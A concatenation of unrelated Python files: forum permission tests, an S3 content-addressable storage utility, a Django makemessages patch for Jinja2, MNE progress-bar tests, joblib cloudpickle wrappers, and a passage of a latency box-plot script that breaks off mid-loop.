    assert moderator_user not in forum.moderators
    assert not can_moderate(moderator_user, forum)
    # Posting rights remain even without moderator status here.
    assert can_post_reply(moderator_user, forum)
    assert can_post_topic(moderator_user, forum)
    # No moderation rights over other users' content in this forum.
    assert not can_edit_post(moderator_user, topic.user_id, forum)
    assert not can_delete_post(moderator_user, topic.user_id, forum)
    assert not can_delete_topic(moderator_user, topic.user_id, forum)
    # Test with own topic
    assert can_delete_post(moderator_user, topic_moderator.user_id, forum)
    assert can_delete_topic(moderator_user, topic_moderator.user_id, forum)
    assert can_edit_post(moderator_user, topic_moderator.user_id, forum)
    # Test moderator permissions
    assert can_edit_user(moderator_user)
    assert can_ban_user(moderator_user)
def test_normal_permissions(forum, user, topic):
    """Test the permissions for a normal user."""
    # A regular user cannot moderate but can post and edit own content.
    assert not can_moderate(user, forum)
    assert can_post_reply(user, forum)
    assert can_post_topic(user, forum)
    assert can_edit_post(user, topic.user_id, forum)
    # No delete rights, no user administration.
    assert not can_delete_post(user, topic.user_id, forum)
    assert not can_delete_topic(user, topic.user_id, forum)
    assert not can_edit_user(user)
    assert not can_ban_user(user)
def test_admin_permissions(forum, admin_user, topic):
    """Test the permissions for a admin user."""
    # An admin has every permission, everywhere.
    assert can_moderate(admin_user, forum)
    assert can_post_reply(admin_user, forum)
    assert can_post_topic(admin_user, forum)
    assert can_edit_post(admin_user, topic.user_id, forum)
    assert can_delete_post(admin_user, topic.user_id, forum)
    assert can_delete_topic(admin_user, topic.user_id, forum)
    assert can_edit_user(admin_user)
    assert can_ban_user(admin_user)
def test_super_moderator_permissions(forum, super_moderator_user, topic):
    """Test the permissions for a super moderator user."""
    # A super moderator moderates every forum, including this one.
    assert can_moderate(super_moderator_user, forum)
    assert can_post_reply(super_moderator_user, forum)
    assert can_post_topic(super_moderator_user, forum)
    assert can_edit_post(super_moderator_user, topic.user_id, forum)
    assert can_delete_post(super_moderator_user, topic.user_id, forum)
    assert can_delete_topic(super_moderator_user, topic.user_id, forum)
    assert can_edit_user(super_moderator_user)
    assert can_ban_user(super_moderator_user)
def test_can_moderate_without_permission(moderator_user):
    """Test can moderate for a moderator_user without a permission."""
    # Idiom fix: `assert not x` instead of `x == False` (PEP 8 / E712);
    # also covers any falsy return value, not just the False singleton.
    assert not can_moderate(moderator_user)
|
""" md5s3stash
content addressable storage in AWS S3
"""
from __future__ import unicode_literals
import sys
import os
import argparse
import tempfile
import urllib2
import urllib
import urlparse
import base64
import logging
import hashlib
import basin
import boto
import magic
from PIL import Image
from collections import namedtuple
import re
regex_s3 = re.compile(r's3.*amazonaws.com')
def main(argv=None):
    """Command-line entry point: stash each URL argument into S3 and print
    a tab-separated report line (url, md5, s3_url, mime_type) per input.
    """
    parser = argparse.ArgumentParser(
        description='content addressable storage in AWS S3')
    parser.add_argument('url', nargs='+',
                        help='URL or path of source file to stash')
    parser.add_argument('-b', '--bucket_base', nargs="?",
                        help='this must be a unique name in all of AWS S3')
    # BUGFIX: choices previously offered 'multivalue', but
    # md5_to_s3_url()/md5_to_http_url() only understand 'simple' and
    # 'multibucket' -- selecting 'multivalue' crashed with
    # UnboundLocalError. The help text was also a copy-paste of -b's.
    parser.add_argument('-s', '--bucket_scheme', nargs="?",
                        default="simple", choices=['simple', 'multibucket'],
                        help='bucket naming scheme: a single bucket ("simple") '
                             'or md5-sharded bucket names ("multibucket")')
    parser.add_argument(
        '-t', '--tempdir',
        required=False,
        help="if your files might be large, make sure this is on a big disk"
    )
    parser.add_argument(
        '-w', '--warnings',
        default=False,
        help='show python `DeprecationWarning`s supressed by default',
        required=False,
        action='store_true',
    )
    parser.add_argument('--loglevel', default='ERROR', required=False)
    parser.add_argument('-u', '--username', required=False,
                        help='username for downloads requiring BasicAuth')
    parser.add_argument('-p', '--password', required=False,
                        help='password for downloads requiring BasicAuth')
    if argv is None:
        argv = parser.parse_args()
    if argv.bucket_base:
        bucket_base = argv.bucket_base
    else:
        # Fall back to the environment when -b is not given.
        assert 'BUCKET_BASE' in os.environ, "`-b` or `BUCKET_BASE` must be set"
        bucket_base = os.environ['BUCKET_BASE']
    if not argv.warnings:
        # supress warnings
        # http://stackoverflow.com/a/2047600/1763984
        import warnings
        warnings.simplefilter("ignore", DeprecationWarning)
    if argv.tempdir:
        tempfile.tempdir = argv.tempdir
    auth = None
    if argv.username:
        auth = (argv.username, argv.password)
    # set debugging level
    numeric_level = getattr(logging, argv.loglevel.upper(), None)
    if not isinstance(numeric_level, int):
        raise ValueError('Invalid log level: %s' % argv.loglevel)
    logging.basicConfig(level=numeric_level, )
    # if being used in a library, probably want to be able to recycle
    # connection?
    conn = boto.connect_s3()
    for url in argv.url:
        print("{0}\t{1}\t{2}\t{3}".format(
            *md5s3stash(url, bucket_base, conn, url_auth=auth, bucket_scheme=argv.bucket_scheme)
        ))
def md5s3stash(
    url,
    bucket_base,
    conn=None,
    url_auth=None,
    url_cache={},
    hash_cache={},
    bucket_scheme='simple'
):
    """ stash a file at `url` in the named `bucket_base` ,
    `conn` is an optional boto.connect_s3()
    `url_auth` is optional Basic auth ('<username>', '<password'>) tuple
    to use if the url to download requires authentication.
    `url_cache` is an object with a dict interface, keyed on url
    url_cache[url] = { md5: ..., If-None-Match: etag, If-Modified-Since: date }
    `hash_cache` is an object with dict interface, keyed on md5
    hash_cache[md5] = ( s3_url, mime_type, dimensions )
    `bucket_scheme` is text string 'simple' or 'multibucket'

    NOTE: the mutable default arguments are deliberate here -- they act as
    module-lifetime caches shared across calls when the caller does not
    supply its own cache objects.
    """
    StashReport = namedtuple('StashReport', 'url, md5, s3_url, mime_type, dimensions')
    # NOTE(review): checkChunks() returns bare False on download errors,
    # which would make this tuple unpacking raise TypeError -- verify the
    # intended error behavior with callers.
    (file_path, md5, mime_type) = checkChunks(url, url_auth, url_cache)
    # EAFP: a hash_cache hit means this content was already stashed;
    # reuse the recorded (s3_url, mime, dimensions) without re-uploading.
    try:
        return StashReport(url, md5, *hash_cache[md5])
    except KeyError:
        pass
    s3_url = md5_to_s3_url(md5, bucket_base, bucket_scheme=bucket_scheme)
    if conn is None:
        conn = boto.connect_s3()
    s3move(file_path, s3_url, mime_type, conn)
    (mime, dimensions) = image_info(file_path)
    os.remove(file_path)  # safer than rmtree
    hash_cache[md5] = (s3_url, mime, dimensions)
    report = StashReport(url, md5, *hash_cache[md5])
    logging.getLogger('MD5S3:stash').info(report)
    return report
def md5_to_s3_url(md5, bucket_base, bucket_scheme='multibucket'):
    """ calculate the s3 URL given an md5 and an bucket_base

    `bucket_scheme` is 'simple' (one flat bucket) or 'multibucket'
    (bucket name sharded by the md5's leading digits).

    Raises ValueError for an unrecognized `bucket_scheme`; previously an
    unknown scheme fell through and raised UnboundLocalError.
    """
    if bucket_scheme == 'simple':
        return "s3://{0}/{1}".format(
            bucket_base,
            md5
        )
    elif bucket_scheme == 'multibucket':
        return "s3://{0}.{1}/{2}".format(
            md5_to_bucket_shard(md5),
            bucket_base,
            md5
        )
    raise ValueError("unknown bucket_scheme: {0!r}".format(bucket_scheme))
def md5_to_http_url(md5, bucket_base, bucket_scheme='multibucket', s3_endpoint='s3.amazonaws.com'):
    """ calculate the http URL given an md5 and an bucket_base

    `bucket_scheme` is 'simple' (path-style URL under one bucket) or
    'multibucket' (virtual-hosted style with a sharded bucket name).

    Raises ValueError for an unrecognized `bucket_scheme`; previously an
    unknown scheme fell through and raised UnboundLocalError.
    """
    if bucket_scheme == 'simple':
        return "http://{0}/{1}/{2}".format(
            s3_endpoint,
            bucket_base,
            md5
        )
    elif bucket_scheme == 'multibucket':
        return "http://{1}.{2}.{0}/{3}".format(
            s3_endpoint,
            md5_to_bucket_shard(md5),
            bucket_base,
            md5
        )
    raise ValueError("unknown bucket_scheme: {0!r}".format(bucket_scheme))
def md5_to_bucket_shard(md5):
    """ calculate the shard label of the bucket name from md5 """
    # "Consider utilizing multiple buckets that start with different
    # alphanumeric characters. This will ensure a degree of partitioning
    # from the start. The higher your volume of concurrent PUT and
    # GET requests, the more impact this will likely have."
    # -- http://aws.amazon.com/articles/1904
    # "Bucket names must be a series of one or more labels. Adjacent
    # labels are separated by a single period (.). [...] Each label must
    # start and end with a lowercase letter or a number. "
    # -- http://docs.aws.amazon.com/AmazonS3/latest/dev/BucketRestrictions.html
    # see also: http://en.wikipedia.org/wiki/Base_36
    ALPHABET = "0123456789abcdefghijklmnopqrstuvwxyz"
    # http://stats.stackexchange.com/a/70884/14900
    # take the first two digits of the hash and turn that into an inteter
    # this should be evenly distributed
    # NOTE(review): the second hex digit is weighted by 10 (not 16), so the
    # combined value is 0..165 and the mod-36 distribution is only roughly
    # even. Do NOT "fix" this -- changing the formula would re-shard every
    # object already stored under the existing scheme.
    int_value = int(md5[0], 16)+10*int(md5[1], 16)
    # divide by the length of the alphabet and take the remainder
    bucket = int_value % len(ALPHABET)
    # basin.encode maps the 0..35 remainder onto a single base-36 character.
    return basin.encode(ALPHABET, bucket)
def is_s3_url(url):
    '''Return True when *url* looks like an Amazon S3 endpoint.

    For s3 urls, if you send http authentication headers, S3 will
    send a "400 Bad Request" in response, so callers use this check to
    skip Basic auth. The pattern also matches regional endpoints such
    as s3-us-west-2.amazonaws.com.
    '''
    return regex_s3.search(url) is not None
def urlopen_with_auth(url, auth=None, cache={}):
    '''Use urllib2 to open url if the auth is specified.
    auth is tuple of (username, password)

    `cache` (shared mutable default, intentional) may hold conditional-GET
    headers recorded by checkChunks(); when present they are replayed so
    the server can answer 304 Not Modified.
    '''
    # DefaultErrorHandler turns 304 responses into return values instead
    # of raised HTTPErrors.
    opener = urllib2.build_opener(DefaultErrorHandler())
    req = urllib2.Request(url)
    p = urlparse.urlparse(url)
    # try to set headers for conditional get request
    try:
        here = cache[url]
        if 'If-None-Match' in here:
            req.add_header('If-None-Match', cache[url]['If-None-Match'],)
        if 'If-Modified-Since' in here:
            req.add_header('If-Modified-Since', cache[url]['If-Modified-Since'],)
    except KeyError:
        pass
    # S3 rejects requests carrying Basic auth headers, so never send auth
    # to S3 URLs (see is_s3_url).
    if not auth or is_s3_url(url):
        if p.scheme not in ['http', 'https']:
            return urllib.urlopen(url)  # urllib works with normal file paths
    else:
        # make sure https
        if p.scheme != 'https':
            raise urllib2.URLError('Basic auth not over https is bad idea! \
                scheme:{0}'.format(p.scheme))
        # Need to add header so it gets sent with first request,
        # else redirected to shib
        b64authstr = base64.b64encode('{0}:{1}'.format(*auth))
        req.add_header('Authorization', 'Basic {0}'.format(b64authstr))
    # return urllib2.urlopen(req)
    return opener.open(req)
def checkChunks(url, auth=None, cache={}):
    """
    Helper to download large files the only arg is a url this file
    will go to a temp directory the file will also be downloaded in
    chunks and md5 checksum is returned
    based on downloadChunks@https://gist.github.com/gourneau/1430932
    and http://www.pythoncentral.io/hashing-files-with-python/

    Returns (file_path, md5, mime_type); on a 304 cache hit the path and
    mime type are None. NOTE(review): on HTTP/URL errors this returns a
    bare False, which breaks tuple-unpacking callers (md5s3stash) with a
    TypeError -- confirm whether raising would be more appropriate.
    The mutable default `cache` is an intentional shared cache.
    """
    # delete=False: the caller uploads the file later and removes it itself.
    temp_file = tempfile.NamedTemporaryFile(delete=False, prefix='md5s3_')
    logging.getLogger('MD5S3').info("temp file path %s" % temp_file.name)
    hasher = hashlib.new('md5')
    BLOCKSIZE = 1024 * hasher.block_size
    try:
        req = urlopen_with_auth(url, auth=auth, cache=cache)
        thisurl = cache.get(url, dict())
        # 304 Not Modified: the cached md5 is still valid, nothing to fetch.
        if req.getcode() == 304:
            return None, thisurl['md5'], None
        mime_type = req.info()['Content-type']
        # record these headers, they will let us pretend like we are a cacheing
        # proxy server, and send conditional GETs next time we see this file
        etag = req.info().get('ETag', None);
        if etag:
            thisurl['If-None-Match'] = etag
        lmod = req.info().get('Last-Modified', None);
        if lmod:
            thisurl['If-Modified-Since'] = lmod
        downloaded = 0
        # Stream in blocks, hashing as we go, so large files never need to
        # fit in memory.
        with temp_file:
            while True:
                chunk = req.read(BLOCKSIZE)
                hasher.update(chunk)
                downloaded += len(chunk)
                if not chunk:
                    break
                temp_file.write(chunk)
    except urllib2.HTTPError, e:
        print "HTTP Error:", e.code, url
        return False
    except urllib2.URLError, e:
        print "URL Error:", e.reason, url
        return False
    md5 = hasher.hexdigest()
    thisurl['md5'] = md5
    cache[url] = thisurl
    return temp_file.name, md5, mime_type
def s3move(place1, place2, mime, s3):
    """Upload local file `place1` to the s3:// URL `place2` with the given
    `mime` type, using boto connection `s3`.

    Content-addressable semantics: if the key already exists the upload is
    skipped, since identical md5 implies identical content.
    """
    l = logging.getLogger('MD5S3:s3move')
    l.debug({
        'place1': place1,
        'place2': place2,
        'mime': mime,
        's3': s3,
    })
    parts = urlparse.urlsplit(place2)
    # SplitResult(scheme='s3', netloc='test.pdf', path='/dkd', query=''
    # , fragment='')
    try:
        # validate=False avoids an extra round-trip when the bucket exists.
        bucket = s3.get_bucket(parts.netloc, validate=False)
        l.debug('bucket exists')
    except boto.exception.S3ResponseError:
        bucket = s3.create_bucket(parts.netloc)
        l.debug('bucket created')
    if not(bucket.get_key(parts.path, validate=False)):
        key = bucket.new_key(parts.path)
        # metadata has to be set before setting contents/creating object.
        # See https://gist.github.com/garnaat/1791086
        key.set_metadata("Content-Type", mime)
        key.set_contents_from_filename(place1)
        # key.set_acl('public-read')
        l.debug('file sent to s3')
    else:
        l.info('key existed already')
def image_info(filepath):
    ''' get image info
    `filepath` path to a file
    returns
      a tuple of two values
        1. mime/type if an image; otherwise None
        2. a tuple of (height, width) if an image; otherwise (0,0)
    '''
    try:
        return (
            magic.Magic(mime=True).from_file(filepath),
            Image.open(filepath).size
        )
    except IOError as e:
        # BUGFIX: `e.message` is deprecated in Python 2.6+ and gone in
        # Python 3; compare against the exception's text portably instead.
        # PIL raises IOError("cannot identify image file ...") for
        # non-image files; anything else is a real error and re-raised.
        if not str(e).startswith('cannot identify image file'):
            raise
        return (None, (0, 0))
class DefaultErrorHandler(urllib2.HTTPDefaultErrorHandler):
    # urllib2 normally raises on a 304 response; this handler converts
    # "304 Not Modified" into a response-like object so checkChunks() can
    # detect a conditional-GET cache hit via req.getcode() == 304.
    def http_error_304(self, req, fp, code, msg, headers):
        result = urllib2.HTTPError(
            req.get_full_url(), code, msg, headers, fp)
        result.status = code
        return result
if __name__ == "__main__":
    # Propagate main()'s return value as the process exit code.
    sys.exit(main())
"""
Copyright (c) 2015, Regents of the University of California
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of the {organization} nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
|
"""Jinja2's i18n functionality is not exactly the same as Django's.
In particular, the tags names and their syntax are different:
1. The Django ``trans`` tag is replaced by a _() global.
2. The Django ``blocktrans`` tag is called ``trans``.
(1) isn't an issue, since the whole ``makemessages`` process is based on
converting the template tags to ``_()`` calls. However, (2) means that
those Jinja2 ``trans`` tags will not be picked up by Django's
``makemessages`` command.
There aren't any nice solutions here. While Jinja2's i18n extension does
come with extraction capabilities built in, the code behind ``makemessages``
unfortunately isn't extensible, so we can:
* Duplicate the command + code behind it.
* Offer a separate command for Jinja2 extraction.
* Try to get Django to offer hooks into makemessages().
* Monkey-patch.
We are currently doing that last thing. It turns out we are lucky
for once: It's simply a matter of extending two regular expressions.
Credit for the approach goes to:
http://stackoverflow.com/questions/2090717/getting-translation-strings-for-jinja2-templates-integrated-with-django-1-x
"""
import re
from django.core.management.commands import makemessages
from django.utils.translation import trans_real
class Command(makemessages.Command):
    def handle(self, *args, **options):
        """Run makemessages with Django's translation-block regexes
        temporarily extended to also match Jinja2's trans/endtrans/pluralize
        syntax, restoring the originals afterwards.
        """
        old_endblock_re = trans_real.endblock_re
        old_block_re = trans_real.block_re
        # BUGFIX: plural_re is patched below but was never saved/restored,
        # so the Jinja2-extended pattern leaked into all later users of
        # trans_real after this command finished.
        old_plural_re = trans_real.plural_re
        # Extend the regular expressions that are used to detect
        # translation blocks with an "OR jinja-syntax" clause.
        trans_real.endblock_re = re.compile(
            trans_real.endblock_re.pattern + '|' + r"""^\s*endtrans$""")
        trans_real.block_re = re.compile(
            trans_real.block_re.pattern + '|' + r"""^\s*trans(?:\s+(?!'|")(?=.*?=.*?)|$)""")
        trans_real.plural_re = re.compile(
            trans_real.plural_re.pattern + '|' + r"""^\s*pluralize(?:\s+.+|$)""")
        try:
            super(Command, self).handle(*args, **options)
        finally:
            trans_real.endblock_re = old_endblock_re
            trans_real.block_re = old_block_re
            trans_real.plural_re = old_plural_re
|
import os.path as op
import numpy as np
from numpy.testing import assert_array_equal
import pytest
from mne.parallel import parallel_func
from mne.utils import ProgressBar, array_split_idx, use_log_level
def test_progressbar():
    """Test progressbar class."""
    a = np.arange(10)
    # Built from an iterable: the iterable is kept and its length becomes
    # the maximum value.
    pbar = ProgressBar(a)
    assert a is pbar.iterable
    assert pbar.max_value == 10
    # Built from an int: only the maximum is set, nothing to iterate.
    pbar = ProgressBar(10)
    assert pbar.max_value == 10
    assert pbar.iterable is None
    # Make sure that non-iterable input raises an error
    def iter_func(a):
        for ii in a:
            pass
    # NOTE(review): Exception is broad here; a more specific type (e.g.
    # TypeError) would make the intent clearer if ProgressBar guarantees it.
    pytest.raises(Exception, iter_func, ProgressBar(20))
def _identity(x):
    """Return *x* unchanged (picklable top-level helper for parallel tests)."""
    return x
def test_progressbar_parallel_basic(capsys):
    """Test ProgressBar with parallel computing, basic version."""
    # Nothing should have been printed before the run.
    assert capsys.readouterr().out == ''
    parallel, p_fun, _ = parallel_func(_identity, total=10, n_jobs=1,
                                       verbose=True)
    with use_log_level(True):
        out = parallel(p_fun(x) for x in range(10))
    # The identity mapping must come back in order.
    assert out == list(range(10))
    cap = capsys.readouterr()
    # The progress bar is written to stderr and should reach completion.
    out = cap.err
    assert '100%' in out
def _identity_block(x, pb):
for ii in range(len(x)):
pb.update(ii + 1)
return x
def test_progressbar_parallel_advanced(capsys):
    """Test ProgressBar with parallel computing, advanced version."""
    assert capsys.readouterr().out == ''
    # This must be "1" because "capsys" won't get stdout properly otherwise
    parallel, p_fun, _ = parallel_func(_identity_block, n_jobs=1,
                                       verbose=False)
    arr = np.arange(10)
    with use_log_level(True):
        with ProgressBar(len(arr)) as pb:
            # Each half of the array reports progress through its own
            # subset view of the shared progress bar.
            out = parallel(p_fun(x, pb.subset(pb_idx))
                           for pb_idx, x in array_split_idx(arr, 2))
            # Progress state is shared via a memory-mapped bool array;
            # every position must have been ticked exactly once.
            assert op.isfile(pb._mmap_fname)
            sum_ = np.memmap(pb._mmap_fname, dtype='bool', mode='r',
                             shape=10).sum()
            assert sum_ == len(arr)
    # Leaving the context must clean up the memmap file.
    assert not op.isfile(pb._mmap_fname), '__exit__ not called?'
    out = np.concatenate(out)
    assert_array_equal(out, arr)
    cap = capsys.readouterr()
    out = cap.err
    assert '100%' in out
def _identity_block_wide(x, pb):
for ii in range(len(x)):
for jj in range(2):
pb.update(ii * 2 + jj + 1)
return x, pb.idx
def test_progressbar_parallel_more(capsys):
    """Test ProgressBar with parallel computing, advanced version."""
    assert capsys.readouterr().out == ''
    # This must be "1" because "capsys" won't get stdout properly otherwise
    parallel, p_fun, _ = parallel_func(_identity_block_wide, n_jobs=1,
                                       verbose=False)
    arr = np.arange(10)
    with use_log_level(True):
        # Two progress updates per array element, hence len(arr) * 2.
        with ProgressBar(len(arr) * 2) as pb:
            out = parallel(p_fun(x, pb.subset(pb_idx))
                           for pb_idx, x in array_split_idx(
                               arr, 2, n_per_split=2))
            # Each worker reports back the subset indices it covered.
            idxs = np.concatenate([o[1] for o in out])
            assert_array_equal(idxs, np.arange(len(arr) * 2))
            out = np.concatenate([o[0] for o in out])
            # Every slot of the shared memmap must have been ticked.
            assert op.isfile(pb._mmap_fname)
            sum_ = np.memmap(pb._mmap_fname, dtype='bool', mode='r',
                             shape=len(arr) * 2).sum()
            assert sum_ == len(arr) * 2
    # Leaving the context must clean up the memmap file.
    assert not op.isfile(pb._mmap_fname), '__exit__ not called?'
    cap = capsys.readouterr()
    out = cap.err
    assert '100%' in out
|
import inspect
from functools import partial
try:
from joblib.externals.cloudpickle import dumps, loads
cloudpickle = True
except ImportError:
cloudpickle = False
WRAP_CACHE = dict()
class CloudpickledObjectWrapper(object):
    """Wrap an object so it is serialized with cloudpickle rather than
    plain pickle, while still behaving like the wrapped object.
    """

    def __init__(self, obj, keep_wrapper=False):
        self._obj = obj
        self._keep_wrapper = keep_wrapper

    def __reduce__(self):
        # Serialize the payload with cloudpickle; plain pickle then only
        # has to transport the resulting byte string.
        _pickled_object = dumps(self._obj)
        if not self._keep_wrapper:
            return loads, (_pickled_object,)
        return _reconstruct_wrapper, (_pickled_object, self._keep_wrapper)

    def __getattr__(self, attr):
        # Ensure that the wrapped object can be used seamlessly as the
        # previous object.
        if attr not in ['_obj', '_keep_wrapper']:
            return getattr(self._obj, attr)
        # BUGFIX: the original `return getattr(self, attr)` recursed
        # infinitely when '_obj'/'_keep_wrapper' were not yet set (e.g.
        # mid-unpickling); raise the conventional AttributeError instead.
        raise AttributeError(attr)
class CallableObjectWrapper(CloudpickledObjectWrapper):
    # Separate subclass so only genuinely callable payloads expose
    # __call__: dunder lookup bypasses __getattr__, so the base class
    # cannot forward calls dynamically.
    def __call__(self, *args, **kwargs):
        return self._obj(*args, **kwargs)
def _wrap_non_picklable_objects(obj, keep_wrapper):
    """Wrap *obj* in the cloudpickle wrapper class matching its callability."""
    wrapper_cls = (CallableObjectWrapper if callable(obj)
                   else CloudpickledObjectWrapper)
    return wrapper_cls(obj, keep_wrapper=keep_wrapper)
def _reconstruct_wrapper(_pickled_object, keep_wrapper):
    # Unpickling counterpart of CloudpickledObjectWrapper.__reduce__ when
    # keep_wrapper is True: restore the payload and re-wrap it.
    obj = loads(_pickled_object)
    return _wrap_non_picklable_objects(obj, keep_wrapper)
def _wrap_objects_when_needed(obj):
    # Function to introspect an object and decide if it should be wrapped or
    # not.
    if not cloudpickle:
        # Without cloudpickle available there is nothing useful to do.
        return obj
    # Objects defined in __main__ cannot be located by plain pickle on the
    # receiving side and therefore need cloudpickle.
    need_wrap = "__main__" in getattr(obj, "__module__", "")
    if isinstance(obj, partial):
        # Recursively wrap the function and every argument captured by the
        # partial, rebuilding an equivalent partial.
        return partial(
            _wrap_objects_when_needed(obj.func),
            *[_wrap_objects_when_needed(a) for a in obj.args],
            **{k: _wrap_objects_when_needed(v)
               for k, v in obj.keywords.items()}
        )
    if callable(obj):
        # Need wrap if the object is a function defined in a local scope of
        # another function.
        func_code = getattr(obj, "__code__", "")
        need_wrap |= getattr(func_code, "co_flags", 0) & inspect.CO_NESTED
        # Need wrap if the obj is a lambda expression
        func_name = getattr(obj, "__name__", "")
        need_wrap |= "<lambda>" in func_name
    if not need_wrap:
        return obj
    # Reuse a previous wrapper for the same object so repeated submissions
    # share one wrapped instance.
    wrapped_obj = WRAP_CACHE.get(obj)
    if wrapped_obj is None:
        wrapped_obj = _wrap_non_picklable_objects(obj, keep_wrapper=False)
        WRAP_CACHE[obj] = wrapped_obj
    return wrapped_obj
def wrap_non_picklable_objects(obj, keep_wrapper=True):
    """Wrapper for non-picklable object to use cloudpickle to serialize them.
    Note that this wrapper tends to slow down the serialization process as it
    is done with cloudpickle which is typically slower compared to pickle. The
    proper way to solve serialization issues is to avoid defining functions and
    objects in the main scripts and to implement __reduce__ functions for
    complex classes.
    """
    if not cloudpickle:
        # BUGFIX: the original message read "could not from joblib.externals
        # import cloudpickle..." -- a garbled sentence; report the failure
        # plainly.
        raise ImportError("could not import cloudpickle. Please install "
                          "cloudpickle to allow extended serialization. "
                          "(`pip install cloudpickle`).")
    # If obj is a class, create a CloudpickledClassWrapper which instantiates
    # the object internally and wrap it directly in a CloudpickledObjectWrapper
    if inspect.isclass(obj):
        class CloudpickledClassWrapper(CloudpickledObjectWrapper):
            def __init__(self, *args, **kwargs):
                self._obj = obj(*args, **kwargs)
                self._keep_wrapper = keep_wrapper
        CloudpickledClassWrapper.__name__ = obj.__name__
        return CloudpickledClassWrapper
    # If obj is an instance of a class, just wrap it in a regular
    # CloudpickledObjectWrapper
    return _wrap_non_picklable_objects(obj, keep_wrapper=keep_wrapper)
|
import math
import sys, re
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import numpy as np
from utils import *
from matplotlib import pylab
from scipy.stats import scoreatpercentile
pkt_size = 256
train_length = 6
class boxplotter(object):
    """Draw a single percentile box — with optional whiskers and an
    extreme-value star — onto a matplotlib-style axis via broken_barh."""

    def __init__(self, median, top, bottom, whisk_top=None,
                 whisk_bottom=None, extreme_top=None):
        self.median = median
        self.top = top
        self.bott = bottom
        self.whisk_top = whisk_top
        self.whisk_bott = whisk_bottom
        self.extreme_top = extreme_top

    def draw_on(self, ax, index, box_color = "blue",
                median_color = "red", whisker_color = "black"):
        """Render this box centered at x-position *index* on *ax*."""
        box_width = .7
        half_width = box_width / 2
        left_edge = index - half_width
        # Box body spanning bottom..top.
        ax.broken_barh([(left_edge, box_width)],
                       (self.bott, self.top - self.bott),
                       facecolor="white", edgecolor=box_color, lw=0.5)
        # Median: a zero-height bar rendered as a horizontal line.
        ax.broken_barh([(left_edge, box_width)],
                       (self.median, 0),
                       facecolor="white", edgecolor=median_color, lw=0.5)
        if self.whisk_top is not None:
            # Upper whisker plus the vertical stem joining it to the box.
            ax.broken_barh([(left_edge, box_width)],
                           (self.whisk_top, 0),
                           facecolor="white", edgecolor=whisker_color, lw=0.5)
            ax.broken_barh([(index, 0)],
                           (self.whisk_top, self.top - self.whisk_top),
                           edgecolor=box_color, linestyle="solid", lw=0.5)
        if self.whisk_bott is not None:
            # Lower whisker plus its stem.
            ax.broken_barh([(left_edge, box_width)],
                           (self.whisk_bott, 0),
                           facecolor="white", edgecolor=whisker_color, lw=0.5)
            ax.broken_barh([(index, 0)],
                           (self.whisk_bott, self.bott - self.whisk_bott),
                           edgecolor=box_color, linestyle="solid", lw=0.5)
        if self.extreme_top is not None:
            ax.scatter([index], [self.extreme_top], marker='*',
                       lw=0.5)
def percentile_box_plot(ax, data, indexer=None, box_top=75,
                        box_bottom=25,whisker_top=99,whisker_bottom=1):
    """Draw one percentile box per dataset in *data* onto *ax*.

    Box edges, whiskers and the extreme marker are placed at the given
    percentiles; *indexer* maps a dataset to its x-position (defaults to
    its 1-based position in *data*). A whisker percentile of None
    disables that whisker.
    """
    if indexer is None:
        indexed_data = list(enumerate(data, 1))
    else:
        indexed_data = [(indexer(datum), datum) for datum in data]

    def whisk_at(vector, pct):
        return None if pct is None else scoreatpercentile(vector, pct)

    for position, sample in indexed_data:
        box = boxplotter(scoreatpercentile(sample, 50),
                         scoreatpercentile(sample, box_top),
                         scoreatpercentile(sample, box_bottom),
                         whisk_at(sample, whisker_top),
                         whisk_at(sample, whisker_bottom),
                         scoreatpercentile(sample, 100))
        box.draw_on(ax, position)
def worst_case_approx(setups, trainlength, plength):
    # Approximate the worst-case end-to-end latency for each setup factor:
    # a fixed base latency plus the serialization time of one packet train
    # scaled by the setup's throughput factor.
    base_worst = 4.0 * 3
    #base_worst = 0.566
    #packet_time = (plength + 18.0) * 8.0 / 10.0 / 1000.0
    # Per-packet serialization time: bytes * 8 bits, divided by 10 and by
    # 1000 -- NOTE(review): presumably a 10 Gbit/s link with the result in
    # microseconds; confirm units against the experiment setup.
    packet_time = plength * 8.0 / 10.0 / 1000.0
    tmp = [x * (packet_time * trainlength) for x in setups]
    worst = [x + base_worst for x in tmp]
    for i in range(len(worst)):
        print "WORST CASE %d: %f" % (setups[i], worst[i])
    return worst
# ---- Command-line handling: alternating <input file> <label> pairs, with
# ---- the output file name as the final (odd) argument.
if len(sys.argv) < 2:
    print "usage: plot_switch_experiment.py <input dir1> <input1 label> " \
        "<input dir2> <input2 label> ... <output file>"
    sys.exit(1)
paper_mode = True
if paper_mode:
    set_paper_rcs()
if (len(sys.argv) - 1) % 2 == 1:
    # odd number of args, have output name
    outname = sys.argv[-1]
    print "Output name specified: %s" % (outname)
else:
    print "Please specify an output name!"
    sys.exit(1)
inputdirs = []
labels = []
for i in range(1, len(sys.argv)-1, 2):
    inputdirs.append(sys.argv[i])
    labels.append(sys.argv[i+1])
# ---- Load one latency series per input file; values are nanoseconds on
# ---- disk and converted to microseconds here. Negative samples are
# ---- dropped (presumably clock-skew artifacts -- see printed count).
data = []
negs_ignored = 0
for indir in inputdirs:
    ds = []
    for line in open(indir).readlines():
